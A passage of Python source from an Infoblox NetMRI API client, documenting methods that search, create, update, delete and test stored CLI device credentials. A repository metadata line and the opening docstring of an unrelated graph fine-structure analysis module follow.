return self.api_request(self._get_method_fullname("show"), kwargs)
def search(self, **kwargs):
"""Lists the available cli credentials matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param CredentialGroupID: The unique identifier of the credential group.
:type CredentialGroupID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param CredentialGroupID: The unique identifier of the credential group.
:type CredentialGroupID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param HitCount: The number of successful uses of this credential.
:type HitCount: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param HitCount: The number of successful uses of this credential.
:type HitCount: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param Origination: Identifies the source of the credential. 'NETC' indicates an internal credential that may be modified or removed during upgrade processes. 'USER' indicates a user-entered credential.
:type Origination: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param Origination: Identifies the source of the credential. 'NETC' indicates an internal credential that may be modified or removed during upgrade processes. 'USER' indicates a user-entered credential.
:type Origination: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param PasswordSecure: The password portion of the credential.
:type PasswordSecure: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param PasswordSecure: The password portion of the credential.
:type PasswordSecure: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param Priority: The priority order in which to attempt this credential.
:type Priority: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param Priority: The priority order in which to attempt this credential.
:type Priority: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param Protocol: The protocol for which to use this credential.
:type Protocol: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param Protocol: The protocol for which to use this credential.
:type Protocol: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param SecureVersion: The encryption version of the username and password.
:type SecureVersion: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param SecureVersion: The encryption version of the username and password.
:type SecureVersion: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param UPWUse: Determines the function of the credential. 'GUESS' indicates that this will only be used if vendor default credential collection is enabled, whereas 'LOCAL' means that this credential will be used in all guessing.
:type UPWUse: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param UPWUse: Determines the function of the credential. 'GUESS' indicates that this will only be used if vendor default credential collection is enabled, whereas 'LOCAL' means that this credential will be used in all guessing.
:type UPWUse: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param UnitID: The internal NetMRI identifier for the NetMRI collector on which the credential is configured.
:type UnitID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param UnitID: The internal NetMRI identifier for the NetMRI collector on which the credential is configured.
:type UnitID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param UsernameSecure: The username portion of the credential.
:type UsernameSecure: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param UsernameSecure: The username portion of the credential.
:type UsernameSecure: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param Vendor: The vendor devices against which to try this credential.
:type Vendor: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param Vendor: The vendor devices against which to try this credential.
:type Vendor: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param id: The internal NetMRI identifier for this credential.
:type id: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param id: The internal NetMRI identifier for this credential.
:type id: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` id
:param sort: The data field(s) to use for sorting the output. Default is id. Valid values are UnitID, Protocol, Origination, UPWUse, HitCount, Vendor, id, Priority, UsernameSecure, PasswordSecure, SecureVersion, CredentialGroupID.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each CLICredential. Valid values are UnitID, Protocol, Origination, UPWUse, HitCount, Vendor, id, Priority, UsernameSecure, PasswordSecure, SecureVersion, CredentialGroupID. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param query: This value will be matched against cli credentials, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: CredentialGroupID, HitCount, Origination, PasswordSecure, Priority, Protocol, SecureVersion, UPWUse, UnitID, UsernameSecure, Vendor, id.
:type query: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return cli_credentials: An array of the CLICredential objects that match the specified input criteria.
:rtype cli_credentials: Array of CLICredential
"""
return self.api_list_request(self._get_method_fullname("search"), kwargs)
def find(self, **kwargs):
"""Lists the available cli credentials matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: CredentialGroupID, HitCount, Origination, PasswordSecure, Priority, Protocol, SecureVersion, UPWUse, UnitID, UsernameSecure, Vendor, id.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_CredentialGroupID: The operator to apply to the field CredentialGroupID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. CredentialGroupID: The unique identifier of the credential group. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_CredentialGroupID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_CredentialGroupID: If op_CredentialGroupID is specified, the field named in this input will be compared to the value in CredentialGroupID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_CredentialGroupID must be specified if op_CredentialGroupID is specified.
:type val_f_CredentialGroupID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_CredentialGroupID: If op_CredentialGroupID is specified, this value will be compared to the value in CredentialGroupID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_CredentialGroupID must be specified if op_CredentialGroupID is specified.
:type val_c_CredentialGroupID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_HitCount: The operator to apply to the field HitCount. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. HitCount: The number of successful uses of this credential. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_HitCount: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_HitCount: If op_HitCount is specified, the field named in this input will be compared to the value in HitCount using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_HitCount must be specified if op_HitCount is specified.
:type val_f_HitCount: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_HitCount: If op_HitCount is specified, this value will be compared to the value in HitCount using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_HitCount must be specified if op_HitCount is specified.
:type val_c_HitCount: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_Origination: The operator to apply to the field Origination. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. Origination: Identifies the source of the credential. 'NETC' indicates an internal credential that may be modified or removed during upgrade processes. 'USER' indicates a user-entered credential. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_Origination: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_Origination: If op_Origination is specified, the field named in this input will be compared to the value in Origination using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_Origination must be specified if op_Origination is specified.
:type val_f_Origination: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_Origination: If op_Origination is specified, this value will be compared to the value in Origination using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_Origination must be specified if op_Origination is specified.
:type val_c_Origination: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PasswordSecure: The operator to apply to the field PasswordSecure. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PasswordSecure: The password portion of the credential. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PasswordSecure: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PasswordSecure: If op_PasswordSecure is specified, the field named in this input will be compared to the value in PasswordSecure using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PasswordSecure must be specified if op_PasswordSecure is specified.
:type val_f_PasswordSecure: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PasswordSecure: If op_PasswordSecure is specified, this value will be compared to the value in PasswordSecure using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PasswordSecure must be specified if op_PasswordSecure is specified.
:type val_c_PasswordSecure: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_Priority: The operator to apply to the field Priority. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. Priority: The priority order in which to attempt this credential. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_Priority: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_Priority: If op_Priority is specified, the field named in this input will be compared to the value in Priority using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_Priority must be specified if op_Priority is specified.
:type val_f_Priority: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_Priority: If op_Priority is specified, this value will be compared to the value in Priority using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_Priority must be specified if op_Priority is specified.
:type val_c_Priority: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_Protocol: The operator to apply to the field Protocol. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. Protocol: The protocol for which to use this credential. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_Protocol: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_Protocol: If op_Protocol is specified, the field named in this input will be compared to the value in Protocol using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_Protocol must be specified if op_Protocol is specified.
:type val_f_Protocol: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_Protocol: If op_Protocol is specified, this value will be compared to the value in Protocol using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_Protocol must be specified if op_Protocol is specified.
:type val_c_Protocol: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_SecureVersion: The operator to apply to the field SecureVersion. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. SecureVersion: The encryption version of the username and password. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_SecureVersion: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_SecureVersion: If op_SecureVersion is specified, the field named in this input will be compared to the value in SecureVersion using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_SecureVersion must be specified if op_SecureVersion is specified.
:type val_f_SecureVersion: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_SecureVersion: If op_SecureVersion is specified, this value will be compared to the value in SecureVersion using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_SecureVersion must be specified if op_SecureVersion is specified.
:type val_c_SecureVersion: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_UPWUse: The operator to apply to the field UPWUse. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. UPWUse: Determines the function of the credential. 'GUESS' indicates that this will only be used if vendor default credential collection is enabled, whereas 'LOCAL' means that this credential will be used in all guessing. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_UPWUse: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_UPWUse: If op_UPWUse is specified, the field named in this input will be compared to the value in UPWUse using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_UPWUse must be specified if op_UPWUse is specified.
:type val_f_UPWUse: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_UPWUse: If op_UPWUse is specified, this value will be compared to the value in UPWUse using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_UPWUse must be specified if op_UPWUse is specified.
:type val_c_UPWUse: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_UnitID: The operator to apply to the field UnitID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. UnitID: The internal NetMRI identifier for the NetMRI collector on which the credential is configured. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_UnitID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_UnitID: If op_UnitID is specified, the field named in this input will be compared to the value in UnitID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_UnitID must be specified if op_UnitID is specified.
:type val_f_UnitID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_UnitID: If op_UnitID is specified, this value will be compared to the value in UnitID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_UnitID must be specified if op_UnitID is specified.
:type val_c_UnitID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_UsernameSecure: The operator to apply to the field UsernameSecure. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. UsernameSecure: The username portion of the credential. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_UsernameSecure: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_UsernameSecure: If op_UsernameSecure is specified, the field named in this input will be compared to the value in UsernameSecure using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_UsernameSecure must be specified if op_UsernameSecure is specified.
:type val_f_UsernameSecure: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_UsernameSecure: If op_UsernameSecure is specified, this value will be compared to the value in UsernameSecure using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_UsernameSecure must be specified if op_UsernameSecure is specified.
:type val_c_UsernameSecure: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_Vendor: The operator to apply to the field Vendor. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. Vendor: The vendor devices against which to try this credential. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_Vendor: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_Vendor: If op_Vendor is specified, the field named in this input will be compared to the value in Vendor using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_Vendor must be specified if op_Vendor is specified.
:type val_f_Vendor: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_Vendor: If op_Vendor is specified, this value will be compared to the value in Vendor using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_Vendor must be specified if op_Vendor is specified.
:type val_c_Vendor: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_id: The operator to apply to the field id. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. id: The internal NetMRI identifier for this credential. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_id: If op_id is specified, the field named in this input will be compared to the value in id using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_id must be specified if op_id is specified.
:type val_f_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_id: If op_id is specified, this value will be compared to the value in id using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_id must be specified if op_id is specified.
:type val_c_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` id
:param sort: The data field(s) to use for sorting the output. Default is id. Valid values are UnitID, Protocol, Origination, UPWUse, HitCount, Vendor, id, Priority, UsernameSecure, PasswordSecure, SecureVersion, CredentialGroupID.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each CLICredential. Valid values are UnitID, Protocol, Origination, UPWUse, HitCount, Vendor, id, Priority, UsernameSecure, PasswordSecure, SecureVersion, CredentialGroupID. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return cli_credentials: An array of the CLICredential objects that match the specified input criteria.
:rtype cli_credentials: Array of CLICredential
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs)
def create(self, **kwargs):
"""Creates a new cli credential.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1
:param CredentialGroupID: The unique identifier of the credential group.
:type CredentialGroupID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` USER
:param Origination: Identifies the source of the credential. 'NETC' indicates an internal credential that may be modified or removed during upgrade processes. 'USER' indicates a user-entered credential.
:type Origination: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param PasswordSecure: The password portion of the credential.
:type PasswordSecure: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param Priority: The priority order in which to attempt this credential.
:type Priority: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` ANY
:param Protocol: The protocol for which to use this credential.
:type Protocol: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` LOCAL
:param UPWUse: Determines the function of the credential. 'GUESS' indicates that this will only be used if vendor default credential collection is enabled, whereas 'LOCAL' means that this credential will be used in all guessing.
:type UPWUse: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param UnitID: The internal NetMRI identifier for the NetMRI collector on which the credential is configured.
:type UnitID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param UsernameSecure: The username portion of the credential.
:type UsernameSecure: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` ANY
:param Vendor: The vendor devices against which to try this credential.
:type Vendor: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return id: The id of the newly created cli credential.
:rtype id: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return model: The class name of the newly created cli credential.
:rtype model: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return uri: A URI that may be used to retrieve the newly created cli credential.
:rtype uri: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return cli_credential: The newly created cli credential.
:rtype cli_credential: CLICredential
"""
return self.api_request(self._get_method_fullname("create"), kwargs)
def update(self, **kwargs):
"""Updates an existing cli credential.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param id: The internal NetMRI identifier for this credential.
:type id: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param CredentialGroupID: The unique identifier of the credential group. If omitted, this field will not be updated.
:type CredentialGroupID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param Origination: Identifies the source of the credential. 'NETC' indicates an internal credential that may be modified or removed during upgrade processes. 'USER' indicates a user-entered credential. If omitted, this field will not be updated.
:type Origination: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param PasswordSecure: The password portion of the credential. If omitted, this field will not be updated.
:type PasswordSecure: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param Priority: The priority order in which to attempt this credential. If omitted, this field will not be updated.
:type Priority: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param Protocol: The protocol for which to use this credential. If omitted, this field will not be updated.
:type Protocol: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param UnitID: The internal NetMRI identifier for the NetMRI collector on which the credential is configured. If omitted, this field will not be updated.
:type UnitID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param UsernameSecure: The username portion of the credential. If omitted, this field will not be updated.
:type UsernameSecure: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param Vendor: The vendor devices against which to try this credential. If omitted, this field will not be updated.
:type Vendor: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return id: The id of the updated cli credential.
:rtype id: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return model: The class name of the updated cli credential.
:rtype model: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return uri: A URI that may be used to retrieve the updated cli credential.
:rtype uri: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return cli_credential: The updated cli credential.
:rtype cli_credential: CLICredential
"""
return self.api_request(self._get_method_fullname("update"), kwargs)
def destroy(self, **kwargs):
"""Deletes the specified cli credential from NetMRI.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param id: The internal NetMRI identifier for this credential.
:type id: Integer
**Outputs**
"""
return self.api_request(self._get_method_fullname("destroy"), kwargs)
def test_ssh_telnet(self, **kwargs):
"""Executes cli credential test and returns results or status id based on async_ind
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: Device ID to specify what device to test cli credentials on (takes precedence over IP address)
:type DeviceID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param UnitID: ID of the collector to send the request to, OC only
:type UnitID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ip_address: IP Address to test id DeviceID is not given
:type ip_address: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VirtualNetworkID: The ID for Virtual Network, must be unique, only needed if DeviceID not set
:type VirtualNetworkID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ssh_username: SSH username
:type ssh_username: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ssh_password: SSH password
:type ssh_password: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param telnet_username: Telnet username
:type telnet_username: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param telnet_password: Telnet password
:type telnet_password: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param enable_password: Enable mode password
:type enable_password: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` False
:param async_ind: When false, the credential test will be run synchronously, and the API call will block until it is complete. When true, credential test id will be returned to use for subsequent calls
:type async_ind: Boolean
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return text: When async_ind is false, credential test text will be returned upon completion.
:rtype text: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return id: The internal #{Brand.lookup(:PRODUCT_NAME_ONLY)} identifier for previously initiated credential test.
:rtype id: String
"""
return self.api_request(self._get_method_fullname("test_ssh_telnet"), kwargs)
def test_ssh_telnet_status(self, **kwargs):
"""CLI credential test status
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param id: Credential test id needed to retrieve status
:type id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param start: The starting index(inclusive) of the returned text of the credential test.
:type start: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return text: credential test result
:rtype text: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return start: The starting index(inclusive) of the returned text of the credential test.
:rtype start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return end: The ending index (exclusive) of the returned text of the credential test.
:rtype end: Integer
"""
return self.api_request(self._get_method_fullname("test_ssh_telnet_status"), kwargs)
| infobloxopen/infoblox-netmri | infoblox_netmri/api/broker/v3_4_0/cli_credential_broker.py | Python | apache-2.0 | 56,135 |
"""fsa.py
This modules implements fine-structure analysis of undirected
graphs with (numeric) vertex attributes. It further contains
functionality to estimate the feature distribution using Gaussian
mixture models, or to build a Bag-of-Words representation from
a collection of feature vectors.
The idea of fine-structure analysis was recently proposed in
[1] Macindoe, O. and W. Richards, "Graph Comparison Using Fine
Structure Analysis". In: Social Computing '10
Note: We do not implement the LBG features of [1]; Our graph
features include a subset of the features proposed in [2]
[2] Li. G. et al., "Graph Classification via Topological and Label
Attributes". In: MLG '11
as well as some additional generic features available in networkx.
"""
__license__ = "Apache License, Version 2.0"
__author__ = "Roland Kwitt, Kitware Inc., University of Salzburg, 2013"
